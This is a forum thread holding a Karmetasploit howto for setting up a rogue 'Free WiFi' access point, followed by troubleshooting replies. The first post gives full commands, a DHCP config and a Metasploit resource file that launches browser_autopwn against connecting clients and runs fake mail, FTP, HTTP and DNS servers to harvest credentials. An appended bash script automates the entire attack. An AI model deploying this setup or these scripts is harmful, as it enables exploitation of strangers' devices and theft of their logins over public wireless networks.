Remote Exploit Forums
BackTrack 4 Howto Tutorials and Howtos about BackTrack 4 (NOT for requesting tutorials or how to do anything)
#1 floyd (Senior Member, joined Mar 2009), 08-17-2009, 11:10 PM
Karmetasploit Howto

I was bored by wireless cracking, so I wanted to try something different. I found Karmetasploit. It's nothing very challenging and I just copied and pasted the information from Karmetasploit – Metasploit and skipped/included things to fit BT 4 Pre Final! But maybe it's useful for someone...

Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerful Metasploit. This is how it worked for me:

First you could update your system with apt-get update && apt-get upgrade.

Then make sure that injection is working:
Code:
airmon-ng start [wifi-interface]
eg. airmon-ng start wlan0

Code:
aireplay-ng --test [monitor-interface]
eg. aireplay-ng --test mon0

If you only have 0 percent values, you likely need to fix your card so that injection works. Then set up the dhcp service:

Code:
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak
And write a new dhcpd.conf:

Code:
nano /etc/dhcp3/dhcpd.conf
Write in the following:
Code:
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}
The next step is to...

.. set up a "Free" Wifi ...
Code:
airbase-ng -P -C 30 -e "Free WiFi" -v [monitor-interface]
... configure interface ...

Code:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
... configure dhcp for the at0 interface

Code:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
You can ignore the error. Then you can place a new file, let's say in /root

Code:
nano /root/karma.rc
with the following content
Code:
load db_sqlite3
db_create /root/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run


use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run

use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
To start to exploit you can run

Code:
/pentest/exploits/framework3/msfconsole -r /root/karma.rc
As soon as somebody (make sure that's you) connects, you get some messages on the screen. When you hit enter you get the Metasploit console, where you can type db_notes to see captured credentials. You could also use tcpdump on the at0 interface to capture the whole traffic.

The interesting thing is, to use another machine, connect to the "Free Wifi" and then try to reach a https page (deactivate NoScript and add an exception for the certificate!). You can see how metasploit tries to exploit the other machine.

I'm very interested in any feedback or how I could develop my evil AP further on...

Last edited by floyd; 10-29-2009 at 08:54 PM.
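The whole procedure from the post above, wrapped into one script. This is an added example and not part of the original post: it keeps the same commands and the same dhcpd.conf and karma.rc, but it backs up dhcpd.conf only once, restores it when the script exits, refuses to start when the injection test reports only 0%, and generates the list of capture servers from a short table. The interface names (wlan0/mon0), the ESSID, the msfconsole path and the dhcpd pid file location are assumptions taken from the post or chosen here; override them through the environment.

```bash
#!/bin/bash
# Added example (not from the original post): the Karmetasploit setup as one
# script, with a restorable dhcpd.conf backup and an injection pre-check.
# Interface names, ESSID, msfconsole path and pid file are assumptions.
set -u

WIFI_IF="${WIFI_IF:-wlan0}"        # managed wifi interface (assumed)
MON_IF="${MON_IF:-mon0}"           # monitor interface created by airmon-ng (assumed)
ESSID="${ESSID:-Free WiFi}"
AP_IP="10.0.0.1"
DHCPD_CONF="${DHCPD_CONF:-/etc/dhcp3/dhcpd.conf}"
DHCPD_PIDFILE="${DHCPD_PIDFILE:-/var/run/dhcpd-at0.pid}"   # assumed location
KARMA_RC="${KARMA_RC:-/root/karma.rc}"
MSFCONSOLE="${MSFCONSOLE:-/pentest/exploits/framework3/msfconsole}"

# Back up a file exactly once, so a second run cannot clobber the real backup.
backup_once() {
    [ -e "$1" ] || return 0
    [ -e "$1.bak" ] || cp -p "$1" "$1.bak"
}

# Put the original back if a backup exists; harmless when there is none.
restore_backup() {
    if [ -e "$1.bak" ]; then mv -f "$1.bak" "$1"; fi
}

# Read `aireplay-ng --test` output on stdin; succeed only if the driver
# reported "Injection is working!" or a directed-probe result above 0%.
injection_ok() {
    grep -Eq 'Injection is working|[0-9]+/[0-9]+:[[:space:]]*[1-9][0-9]*%'
}

# The dhcpd.conf from the post, written to $1.
write_dhcpd_conf() {
    cat > "$1" <<EOF
option domain-name-servers $AP_IP;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers $AP_IP;
  option domain-name-servers $AP_IP;
}
EOF
}

# The karma.rc from the post, generated from a service:port:ssl list so a
# capture server is one entry to add or drop.
write_karma_rc() {
    {
        printf '%s\n' "load db_sqlite3" "db_create /root/karma.db" \
            "use auxiliary/server/browser_autopwn" \
            "setg AUTOPWN_HOST $AP_IP" "setg AUTOPWN_PORT 55550" "setg AUTOPWN_URI /ads" \
            "set LHOST $AP_IP" "set LPORT 45000" "set SRVPORT 55550" "set URIPATH /ads" "run"
        for svc in pop3:110:false pop3:995:true ftp:21:false imap:143:false imap:993:true \
                   smtp:25:false smtp:465:true http:80:false http:8080:false \
                   http:443:true http:8443:true; do
            name=${svc%%:*}; rest=${svc#*:}; port=${rest%%:*}; ssl=${rest#*:}
            printf '%s\n' "use auxiliary/server/capture/$name" \
                "set SRVPORT $port" "set SSL $ssl" "run"
        done
        for port in 5353 53; do
            printf '%s\n' "use auxiliary/server/fakedns" "unset TARGETHOST" \
                "set SRVPORT $port" "run"
        done
    } > "$1"
}

# Stop what we started and put dhcpd.conf back, whatever way we exit.
cleanup() {
    [ -r "$DHCPD_PIDFILE" ] && kill "$(cat "$DHCPD_PIDFILE")" 2>/dev/null
    kill "${AIRBASE_PID:-}" 2>/dev/null
    restore_backup "$DHCPD_CONF"
}

main() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; exit 1; }
    airmon-ng start "$WIFI_IF" >/dev/null
    if ! aireplay-ng --test "$MON_IF" 2>&1 | injection_ok; then
        echo "injection test reported 0%: fix the driver before going on" >&2
        exit 1
    fi
    trap cleanup EXIT INT TERM
    backup_once "$DHCPD_CONF"
    write_dhcpd_conf "$DHCPD_CONF"
    airbase-ng -P -C 30 -e "$ESSID" -v "$MON_IF" &
    AIRBASE_PID=$!
    sleep 3                                  # airbase-ng needs a moment to create at0
    ifconfig at0 up "$AP_IP" netmask 255.255.255.0
    dhcpd3 -cf "$DHCPD_CONF" -pf "$DHCPD_PIDFILE" at0
    write_karma_rc "$KARMA_RC"
    "$MSFCONSOLE" -r "$KARMA_RC"
}

case "${1:-}" in start) main ;; esac
```

Run it as `./karma.sh start` as root; without the argument it only defines the functions, so the pieces (the dhcpd.conf writer, the injection-output check) can be reused or tried on their own. The EXIT trap is what answers reply #4 below: dhcpd.conf goes back to the original as soon as the script ends, so dhcp3-server keeps starting normally on the next boot.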
#2 (Junior Member, joined Sep 2006), 08-18-2009, 03:33 AM

Well compiled, thanks!
#3 phoenix910 (Senior Member, joined Aug 2007), 08-18-2009, 05:20 AM

Thanks, I haven't actually tried this out yet, but may do so later on. Appreciate it!

~phoenix910
#4 (Member, joined Nov 2008), 08-21-2009, 07:31 PM

I ran this and it seemed to work very nicely, but I do have one problem: when I tried to change my dhcpd.conf to a .bak file it didn't save, and now whenever I start BackTrack it says dhcp3 failed. I'm not sure what it really does, but does anyone have their backup of it that they could send me or post, just to be safe?
#5 (Member, joined Oct 2008), 08-21-2009, 08:32 PM

Quote:
Originally Posted by dragracekid
I ran this and it seemed to work very nicely, but I do have one problem: when I tried to change my dhcpd.conf to a .bak file it didn't save, and now whenever I start BackTrack it says dhcp3 failed. I'm not sure what it really does, but does anyone have their backup of it that they could send me or post, just to be safe?

Boot the live CD and copy it from there ...

m-1-k-3
#6 #mfBaranian# (Senior Member, joined Feb 2009), 08-21-2009, 09:16 PM

You can just remove dhcp from startup services.

Code:
# update-rc.d -f dhcp3-server remove
#7 (Member, joined Nov 2008), 08-21-2009, 10:11 PM

Quote:
Originally Posted by m-1-k-3
Boot the live CD and copy it from there ...

Didn't even think about that, I feel dumb lol
#8 (Member, joined Dec 2007), 08-23-2009, 08:03 PM

When I try to run the following command:

airbase-ng -P -C 30 -e "Free WiFi" -v ath0

I get an error message saying something about the "P" option not existing. I checked the help and noticed that the "P" & "C" options are not listed. (They did exist before, but I ran the "apt-get update && apt-get upgrade" command and that's when airbase seems to have changed.)

airbase-ng

Airbase-ng 1.0 rc1 - (C) 2008 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org

usage: airbase-ng <options> <replay interface>

Options:

-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file

Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file

--help : Displays this usage screen

No replay interface specified.
#9 Eatme (Senior Member, joined Aug 2009), 08-23-2009, 10:16 PM

Is this something similar to the Karma.sh script, where you make a fake AP and DoS the targeted AP so it goes offline, so that the user is directed to a fake login page or something like that and is made to put in a user name or the WPA???

hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html
#10 archangel.amael (Moderator, joined Nov 2007), 08-24-2009, 01:22 PM

Quote:
Originally Posted by Eatme
Is this something similar to the Karma.sh script, where you make a fake AP and DoS the targeted AP so it goes offline, so that the user is directed to a fake login page or something like that and is made to put in a user name or the WPA???

hxxp://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html

Pay attention, read a little bit and comprehend what you read, instead of making useless posts. The first post states what this thread is about.
Quote:
Karmetasploit is the merge of Karma and Metasploit. So you have an evil AP which accepts all connections and you have the powerful Metasploit.